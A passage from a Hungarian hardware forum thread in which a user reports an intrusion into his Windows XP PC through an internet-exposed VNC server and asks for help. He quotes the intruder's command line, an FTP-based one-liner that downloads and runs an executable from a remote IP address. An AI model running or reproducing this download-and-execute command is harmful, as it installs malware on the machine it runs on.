Új hozzászólás Aktív témák

  • Batman

    őstag

    Hát sajnos nagyon ugy fest ,hogy valaki nekem is betört a gépemre. :(

    Egy linksys wrt54g v5-ös ruterem van, amire hétvégen raktam fel dd-wrt firmwaret.
    Vnc-t eddig csak lokális hálózaton használtam, de most kellet hogy kívülről is elérhessem.
    Tegnap beállítottam, erre este mikor leülök a gép elé mit látok valaki nagybna dolgozik rajta távolról a vnc ikon aktív és csinálja adolgát.
    A routeren engedélyeztem a portot ami kell neki, és a vnc-ben egy 8 hosszú kis és nagy betüt és számot is tartalmazó kodot használtam, nincs ben tszótarban a szó ,úgy gondoltam ez elég lesz.De tévedtem.

    Nézegetem a routerben a bejövő logokat hátha találok egy ip-t vagy valami de full üres.
    A jelszót rajtam kívül senki sem ismerte.

    Amugy az emberünk folyamatosan ezt írkálta a run-ba:

    cmd.exe /c del iecho open 86.101.48.236 4807 > iecho user 1 1 >> i echo get 882.exe >> i echo quit >> i ftp -n -s:i 882.exedel iexit

    Mindig másik ip-t adott meg, ez a parancssor mit hajt végre?


    Most a routeren is lezártama portokat és a vnc servert is kilőttem.
    Jah azt elfelejtettem írni ez egy win xp prof avg vírusírtóval, ő semmit nem vett észre de nem is ez a dolga.


    üdv

    A Rák ellen az Emberért a Holnapért! - "..ez csak azt bizonyítja, hogy a Firefoxtól maximum a pöcsöd érzed nagyobbnak, de ugyanolyan hüje maradsz a számítógéphez..." by moonman

Új hozzászólás Aktív témák